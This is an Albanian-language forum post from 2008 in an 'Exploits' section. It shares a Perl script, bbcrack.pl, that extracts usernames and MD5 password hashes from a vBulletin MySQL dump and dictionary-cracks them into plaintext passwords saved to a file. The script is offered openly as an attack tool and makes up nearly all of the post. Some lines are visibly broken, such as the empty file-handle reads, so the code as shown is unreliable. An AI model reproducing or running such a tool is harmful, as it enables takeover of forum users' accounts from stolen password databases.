Would you like to react to this message? Create an account in a few clicks or log in to continue.



 
ForumPortaliGalleryKėrkoLatest imagesRegjistrohuidentifikimi
...:::Meny Kryesore:::...
 Home
 Portali
 Forum
 Lista e Antarve
 Galeria
 Lajmet Flash
 Profili
 FAQ
 Testi I Dashuris
favoritos.gif Media & Muzika
 Telivizionet Live
 Video Klipe
 Ruzulltatet Sportive
 Mp3 Falass
 Mp3 RAP
 Kerkesa Muzikore
 Melodi Per Celular
icon_community.gif Argėtim-Zbavitje
 Video Humoristike
 Luani Lojra
 Dezing
 Poezi
 Gediche
 Argėtime
 Albumi Fotografik
 Tema tė Ndryshme
som_downloads.gif Shkarkime & Links
King-Rap Tolbar
Programe
Shkarko Scripte
Chat Programs
 Kėrko nė Forum
 Liderėt e forumit
 Ndihmė
 Kėrko
Moti Momental

Permbajta e ksaj faqe kerkon flash player per instalim kliko mbi ket tekst.


Futu nė chat
V-Bulletin Automatic Hash Cracker Chatzl10
Top 5 softuerėt antivirus pėr 2008
HTML clipboard
Top 5 softuerėt antivirus pėr 2008

1. Bit Defender

2. Kaspersky

3. Eset NOD32

4. Trend Micro Antivirus

    plus AntiSpyware 

5. F-Secure Anti-Virus 

Gallery
V-Bulletin Automatic Hash Cracker Empty
SMS Falas nga KING-RaP
Partnerėt
>>> AlBaZeMeR <<<

XoFaCe

->>Ks-MaX <<<---

->> KoSoVa.Li <<<---

 ->> Muzik-Anglisht <<<---

V.I.P Galeri

Top posters
kanuni
V-Bulletin Automatic Hash Cracker Vote_lcapV-Bulletin Automatic Hash Cracker Voting_barV-Bulletin Automatic Hash Cracker Vote_rcap 
Xhebraili
V-Bulletin Automatic Hash Cracker Vote_lcapV-Bulletin Automatic Hash Cracker Voting_barV-Bulletin Automatic Hash Cracker Vote_rcap 
vissari
V-Bulletin Automatic Hash Cracker Vote_lcapV-Bulletin Automatic Hash Cracker Voting_barV-Bulletin Automatic Hash Cracker Vote_rcap 
El-Fuego
V-Bulletin Automatic Hash Cracker Vote_lcapV-Bulletin Automatic Hash Cracker Voting_barV-Bulletin Automatic Hash Cracker Vote_rcap 
drini-89
V-Bulletin Automatic Hash Cracker Vote_lcapV-Bulletin Automatic Hash Cracker Voting_barV-Bulletin Automatic Hash Cracker Vote_rcap 
RiRi
V-Bulletin Automatic Hash Cracker Vote_lcapV-Bulletin Automatic Hash Cracker Voting_barV-Bulletin Automatic Hash Cracker Vote_rcap 
dj-baba
V-Bulletin Automatic Hash Cracker Vote_lcapV-Bulletin Automatic Hash Cracker Voting_barV-Bulletin Automatic Hash Cracker Vote_rcap 
dosti
V-Bulletin Automatic Hash Cracker Vote_lcapV-Bulletin Automatic Hash Cracker Voting_barV-Bulletin Automatic Hash Cracker Vote_rcap 
king
V-Bulletin Automatic Hash Cracker Vote_lcapV-Bulletin Automatic Hash Cracker Voting_barV-Bulletin Automatic Hash Cracker Vote_rcap 
miri
V-Bulletin Automatic Hash Cracker Vote_lcapV-Bulletin Automatic Hash Cracker Voting_barV-Bulletin Automatic Hash Cracker Vote_rcap 
Keywords
Gashi Meda
IP Addressa Juaj&Reklama
IP


 

 V-Bulletin Automatic Hash Cracker

Shko poshtė 
AutoriMesazh
El-Fuego




Numri i postimeve : 159
Join date : 12/06/2008
Age : 111
Location : Peja Morder City

V-Bulletin Automatic Hash Cracker Empty
MesazhTitulli: V-Bulletin Automatic Hash Cracker   V-Bulletin Automatic Hash Cracker Icon_minitimeThu Jun 12, 2008 8:31 pm

#!/usr/bin/perl
# Hollow Chocolate Bunnies From Hell presenting
# bbcrack.pl
#
# Extracts and cracks hashes of a given MySQL dump of a
# vBulletin board
#
# by softxor
# http://bunnies.rootyourbox.org/
# IRC: irc.milw0rm.com #hcbfh

use strict;
use Digest::MD5 qw(md5_hex);
my $num_cracked = 0;
my $duration = time();
my @hashes;


if ($#ARGV != 1) {
print "Usage: bbcrack.pl [SQL FILE] [DICTIONARY]\n";
exit;
}


# extract hashes from the SQL table
open(SQLFILE, $ARGV[0]) or die('Cannot open SQL Database $ARGV[1]');

print "Extracting hashes from file.\n";

my @hash_file = ;

foreach my $line (@hash_file) {
if ($line =~ m/'([0-9a-zA-Z]+)\'\, \'([0-9a-fA-F]{32})\'/g) {
push(@hashes, "$1:$2");
#print "Found h$1:$2\n"; # uncomment for dumping hashes to stdout
}
}

print "Found ".($#hashes + 1)." hashes.\n";


# and if you are not willing, you'll never grow old!
print "Trying to break hashes. Be patient.\n";

open(OUT, ">cracked") or die('Cannot create or write to cracked file. Try chmod the working directory accordingly.');
open(DICT, $ARGV[1]) or die('Cannot open dictionary file $ARGV[1]');


foreach (@hashes) {

my ($username, $hash) = split(":", $_);
my $foundh = 0;

#print "Trying $username\n"; # uncomment for verbose output

seek(DICT, 0, 0);

while (chomp(my $line = )) {

if ($hash eq md5_hex($line)) {
print "Cracked: $username : $line\n";
print OUT "$username : $line\n";
$foundh = 1;
$num_cracked++;

last;
}

}


if ($foundh) {
last;
}

}

close DICT;

$duration = time() - $duration;
print "Finished.\nDuration: $duration Seconds\n$num_cracked/".($#hashes + 1)." hashes cracked.\n";

exit;


PS.pasi kohve te fundit gjuha programuese perl si dhe exploitat e programura ne perl perdoren mjaft shum, ather e kisha pas ni sugjerim per me hap ni nen forum per perl apo perl exploits
Mbrapsht nė krye Shko poshtė
 
V-Bulletin Automatic Hash Cracker
Mbrapsht nė krye 
Faqja 1 e 1
 Similar topics
-
» Online Hash Cracker
» Msn account Cracker

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
 :: ..:: INFORMATIKA ::.. :: Exploits-
Kėrce tek: